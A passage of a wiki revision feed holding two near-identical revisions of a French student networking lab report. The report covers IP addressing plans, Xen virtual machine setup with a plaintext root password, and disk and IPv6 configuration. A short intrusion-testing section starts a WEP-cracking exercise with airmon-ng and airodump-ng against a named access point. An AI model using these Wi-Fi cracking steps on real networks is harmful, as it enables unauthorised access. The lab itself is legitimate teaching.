| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home&lt;br /&gt;
 xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
 &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.188&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
&lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL +''' [&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
BSSID choisi :&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09 =&amp;gt; kracotte10&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56281</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56281"/>
				<updated>2021-10-25T15:58:39Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 !/dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 !/dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home&lt;br /&gt;
 xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
 &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.188&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
&lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
